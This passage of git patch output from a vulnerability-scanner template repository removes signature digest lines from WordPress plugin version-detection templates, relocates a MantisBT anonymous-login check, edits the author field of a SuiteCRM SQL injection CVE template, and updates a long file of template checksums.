b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d27581421e435c9c08dcdc7779859d3ddafa3db275b6ca7fedc49bd7872130f602206166c58f888da5e46c487407359a68231dcaf9b2e637861a622d226f0765c3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 03c096f3aa..da6abc2a81 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8743a297cf75caac3984fd204b83188d931d3486a7867491b7f283e9277c1ac022033e0bc7d3a0e0796b933e27f6e426e8f96be9e212e104e4b5d9022f34a55c625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 386a43abad..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220170ff29ba15d91e0bdcc391a31f18145109840eb88d6188115d9810ce85f712b02203023bf16378ff890174a2ffe4318b0038902b36d8570e120f7b42160ff018295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 58d346fcdd..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022065e92e7a7b8ba2fab80ada723d9f5cd62e3cf9d99c37e60aba9847d587b6c17902202b5165c7d6427dc73831d78a4c3db368b7fab5da222a1a2dd193a192264e901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 3f87c6a330..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220769dd70ea8ca140a77bb108c775dc91df0774d6fe1fdfdd99f0c1887db866862022100ae8064d72402915e76d3346b2d20512ba3cecf5a719e6ce0be1fd44c88b92932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 5cc8a49e95..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e61d95d3f2cffa995f936a1305c051dd8bf0d92ac784053aa0ad046d323bb2e0220576d96c7d335968ede2a7c79a3aaefcdf9e59e69f15380d3b895d5a4949437df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b4f5d9abfc..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a92b15b5ae1cdcda325b748b7bbd716b7c36b7fd3baca034abd5c2e461b66705022009ff931a5022553bbd4670482c4016a1d72628f11216653d51177e94becbe0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 7097ae92db..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220666ec0a80ee38cacfc711704cd45751284592c290cb1186234010f97f613ac4502204f2b1c5dbba243c4c75a0996090710b170971da1ba1707e8ab9e81eff99cdc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 86250ca660..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e8b0b790389332084c2623372053aaeb5fa801e2d1c08885ed50459cfe6657402202b9e0fdfd0954dc0ae11203189a6438cc340e6d2393eaa703fdddcb82ac8e87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a9be6082997c699e7f8300a65bfa38ab0bc5f54d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Jun 2024 11:04:45 +0530 Subject: [PATCH 0475/1841] Update and rename http/default-logins/mantisbt-anonymous-login.yaml to http/default-logins/mantisbt/mantisbt-anonymous-login.yaml --- .../default-logins/{ => mantisbt}/mantisbt-anonymous-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/default-logins/{ => mantisbt}/mantisbt-anonymous-login.yaml (96%) diff --git a/http/default-logins/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml similarity index 96% rename from http/default-logins/mantisbt-anonymous-login.yaml rename to http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index e4627216de..d8b07d134a 100644 --- a/http/default-logins/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -25,7 +25,7 @@ http: - 'user-info">anonymous"' - 'My View' - 'Roadmap' - condition: and + condition: and - type: status status: From 3b7e9fcaea1aaf61e16e08e369dccdcf071c0dcd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Jun 2024 11:05:36 +0530 Subject: [PATCH 0476/1841] minor update --- http/cves/2024/CVE-2024-36412.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-36412.yaml b/http/cves/2024/CVE-2024-36412.yaml index cc86830991..b189e5eb2c 100644 --- a/http/cves/2024/CVE-2024-36412.yaml +++ b/http/cves/2024/CVE-2024-36412.yaml @@ -2,7 +2,7 @@ id: CVE-2024-36412 info: name: SuiteCRM - SQL Injection - author: securityforeveryone.com + author: securityforeveryone severity: critical description: | SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue. From 5c65e5a30c414a59f6d7589a0cb83e15c1634212 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 05:36:55 +0000 Subject: [PATCH 0477/1841] Auto Generated Templates Checksum [Fri Jun 21 05:36:55 UTC 2024] :robot: --- templates-checksum.txt | 435 +++++++++++++++++++++-------------------- 1 file changed, 218 insertions(+), 217 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d5e8e83626..4208317349 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -636,7 +636,7 @@ helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d61 helpers/wordpress/plugins/advanced-custom-fields.txt:f454be7d464d6c09f200806744a41ceb54f6bcfd helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 +helpers/wordpress/plugins/all-in-one-seo-pack.txt:4a74356d25940a094bf92b6722f74e38e3ad55ec helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3463dc4a05124b0 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f @@ -666,7 +666,7 @@ helpers/wordpress/plugins/contact-form-7.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05 helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d -helpers/wordpress/plugins/copy-delete-posts.txt:2c7ad9bdb0a7acde0d6d7e7f185bdbe164ef4ca9 +helpers/wordpress/plugins/copy-delete-posts.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 @@ -705,7 +705,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:c3c414dd549c09cb265d8cf95a helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b helpers/wordpress/plugins/google-sitemap-generator.txt:5b10aa0446ed4db0d92e61d502b9ac9a6d6563e7 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:d2fcc8823f1ab00267761e1899524f6acaf1c6ae +helpers/wordpress/plugins/gutenberg.txt:b6e10b645f3ab7a7a9d011ad1601bf695ace86af helpers/wordpress/plugins/happy-elementor-addons.txt:8365908e3026803300d1009572fe7bf474d0927b helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -714,8 +714,8 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/hostinger.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 -helpers/wordpress/plugins/image-optimization.txt:2fdf7d04f0372055c9d77ca43d9a3c08798905f3 +helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 +helpers/wordpress/plugins/image-optimization.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:1467c965873cc632279bc3b451f12414b23902fc @@ -727,7 +727,7 @@ helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 helpers/wordpress/plugins/kadence-blocks.txt:45effb36b85fab8162ce999d16a2e5e6a286f313 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:43ddb1cda513914337740779bb2bfd8d0026778c +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:1b4bbc3fd21af919b4e3c0a4dc7f4505c98735d5 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 @@ -741,7 +741,7 @@ helpers/wordpress/plugins/mainwp-child.txt:6746a82081d852d58b152584407d5b80d3ac4 helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 -helpers/wordpress/plugins/meta-box.txt:df805429f6823d1d7321bcb6d64c21695e3fa92e +helpers/wordpress/plugins/meta-box.txt:193731126fc28e1c2848ea069e492a3a46c5fcf4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 helpers/wordpress/plugins/newsletter.txt:d65b7f11924aba386b754c66ffada0aae0642b22 @@ -771,7 +771,7 @@ helpers/wordpress/plugins/really-simple-ssl.txt:d99db0a3dd6b78893c0a445c767ef7a5 helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:e148fc472a5a0161cd1760ec8f7299c1026fc377 +helpers/wordpress/plugins/royal-elementor-addons.txt:a56cd29155af22769bebe0b88ece9fc6cfca3731 helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/seo-by-rank-math.txt:c98fdfe8d33e88802886bd84d87d6117bcb8ad03 helpers/wordpress/plugins/sg-cachepress.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 @@ -779,14 +779,14 @@ helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90ded helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b -helpers/wordpress/plugins/simple-history.txt:d29d2a3d67d2fb8572e4508f3748bc98f063f626 +helpers/wordpress/plugins/simple-history.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e helpers/wordpress/plugins/siteorigin-panels.txt:f522f67ac832d3968e5b0a47580f0ac715e89f4b helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 helpers/wordpress/plugins/so-widgets-bundle.txt:222da8dca74c58580fd6817da4aef16582951efe helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 -helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:ff8246489d9fca30c2e6426aea442fe114e94244 +helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 helpers/wordpress/plugins/sucuri-scanner.txt:418cebfead647b325cd7291fe371d7f92515a84f helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 @@ -814,12 +814,12 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a2 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 -helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:a13d4e1d1641b231b44592642d25363ccc2cbb05 +helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:356ef5627363fd1b4d41745a26ed9916eeb9fe9b helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/woocommerce.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 +helpers/wordpress/plugins/woocommerce.txt:ef691a1cf1ef79929e634736f9069bccdc166400 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 @@ -837,14 +837,14 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:99d481ff0df2b58220e9d619c86ddce4d61e9726 helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 -helpers/wordpress/plugins/wp-seopress.txt:4a68bf238bc0f5c253db5c3e544b53f300b954a5 +helpers/wordpress/plugins/wp-seopress.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/wp-smushit.txt:7a8d382588d05ad4101faadabc1f1b04a42eaada +helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:d2c05942fd98efff4c5130f3478ddaad1ed28f27 helpers/wordpress/plugins/wp-super-cache.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 -helpers/wordpress/plugins/wpcf7-redirect.txt:d1fd48333115227b181b4b132e5511e91d95bea5 +helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc helpers/wordpress/plugins/wps-hide-login.txt:245d85e4cf834057b5214fa088b67dda2c1ac360 helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 @@ -3204,7 +3204,7 @@ http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc http/cves/2023/CVE-2023-46347.yaml:f8aaf0e2faa39f28d7f1f9d33c7b171d9ad38340 http/cves/2023/CVE-2023-46359.yaml:83426962f0f9937b49f713603c55628d16552b16 http/cves/2023/CVE-2023-46574.yaml:174ebe98cec3e58cd5233927899da721b1003e0c -http/cves/2023/CVE-2023-46732.yaml:447b853ace0a7fb18ace19291251bb8aaf3e07dd +http/cves/2023/CVE-2023-46732.yaml:c877d0e1689f2fb8d52ddd715d165ead948f349d http/cves/2023/CVE-2023-46747.yaml:8034386aab766649cefb93c12ae6cd42ae1b09d9 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 @@ -3330,6 +3330,7 @@ http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:46f1ec812df6008b68dadfc51bc4453cbeda7539 +http/cves/2024/CVE-2024-29895.yaml:8ce82f00f02e3628feaefd928f43a371c9a25bb7 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -7113,227 +7114,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:8a1ffeea02ebeffc8410e9288bf030b3c5bada9d -http/technologies/wordpress/plugins/add-to-any.yaml:65204eaae7a13ab8a29bbf83da8d15e95e97c0d2 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:7ce1773d5efe1de4eeb7415ba09b9cd006dcd56b +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:d83a2498212efae38e2800f2738b94cc343e2004 -http/technologies/wordpress/plugins/akismet.yaml:2cecbeef3f952c39660b7ef526d993352e55f33e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:82d3dc074be08b3cb3a127b3c5143033287c56c0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:986e1854717daf515414c9a0c9d0c0496cb70f37 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:62e48a18cd7e1f7f2d2aa5f6947b5548f155a388 -http/technologies/wordpress/plugins/amp.yaml:aa062ccfe8a72aa5d2824678cd7f58f34f331e1c -http/technologies/wordpress/plugins/antispam-bee.yaml:f8038ff2bb03c79da607373e3c9a0c23c7f8bbf3 -http/technologies/wordpress/plugins/astra-sites.yaml:46efea6fca8b756b04ab348a85ada60c08bf5823 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:920879237f499900baf2885e55366f40fd1483af -http/technologies/wordpress/plugins/backwpup.yaml:1b8555353f35ea9deeff6a99e0f27d5d6cdbf261 -http/technologies/wordpress/plugins/better-search-replace.yaml:85dece5faa6c7999a7c5b33f07e44fdee30bb9a6 -http/technologies/wordpress/plugins/better-wp-security.yaml:4cf414ce4912b124231ec5aaeb029b45efe6b944 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:5ed41ba8fd1aa09a8f551568c145d17b843810a6 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0105c127b0eb3f7d3db3f7383e20176d95594a9c -http/technologies/wordpress/plugins/breeze.yaml:9f3ced869567097600cffe638dfd84f1ee140413 -http/technologies/wordpress/plugins/broken-link-checker.yaml:721f1b1c567da662b80df839a2931ec1ff6bf07f -http/technologies/wordpress/plugins/child-theme-configurator.yaml:730f9ef6ac3b7d157b7602bc10bb245d90d0f035 -http/technologies/wordpress/plugins/classic-editor.yaml:4721378795bc8a655fb5f3fe347d06f1c014bb7e -http/technologies/wordpress/plugins/classic-widgets.yaml:7dbc9639154a49186a720e4b907e75840ccedb6f -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:a49bc127f4733bcbddc840ce8f4a346fa48e4079 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:930d38a8a5c2d442f24e07ef808431102959d2c0 -http/technologies/wordpress/plugins/coblocks.yaml:cd60918bc5aae2fdf705003f59865bde969a3457 -http/technologies/wordpress/plugins/code-snippets.yaml:3467830f26bbaea226baf42c16e7d36452544604 -http/technologies/wordpress/plugins/coming-soon.yaml:30b84cb7f8135859a20ab4071a22fa65436dce8c -http/technologies/wordpress/plugins/complianz-gdpr.yaml:a68365cdd393a1f0137238174e6d7a30a00be4f1 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:8af5feb747e5e491e45eb8d65a9f2e65f16e824c -http/technologies/wordpress/plugins/contact-form-7.yaml:c0d94276a71f52550c7598ac5365301deee6c103 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:aefdbdbd22e5b639f9188adff52e12e09415c452 -http/technologies/wordpress/plugins/cookie-law-info.yaml:812a0895e545a2fb654d426694a10ee6d9d60e7a -http/technologies/wordpress/plugins/cookie-notice.yaml:34d945b71cb81ec86066ea42cfd474291d3cbd35 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:78aab014f51ae26689db95c7f12d336053db93a0 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:0fe9a0c706d46c2520ddc44e4dc1c7726c294acc -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:905cbda502aca1cfbfb2c43a6dad0c83a37c3911 -http/technologies/wordpress/plugins/custom-css-js.yaml:0b52c6c5e7c646ca3e0bfcbf4295825a13a8bad8 -http/technologies/wordpress/plugins/custom-fonts.yaml:4820659f1a78e1ca92c5b7dbc13b034cf50f2f23 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e2f29727528326bcd745fe9f3e6010dac33357f5 -http/technologies/wordpress/plugins/disable-comments.yaml:6a297643f3c8acb042ed8079cae90e653cbd9729 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:dc65e64aaf4dda3ce5f9a9b9bf94db5b277df75c -http/technologies/wordpress/plugins/duplicate-page.yaml:194b45e1155aa37d9daecb29ba6d3ce0c6105c97 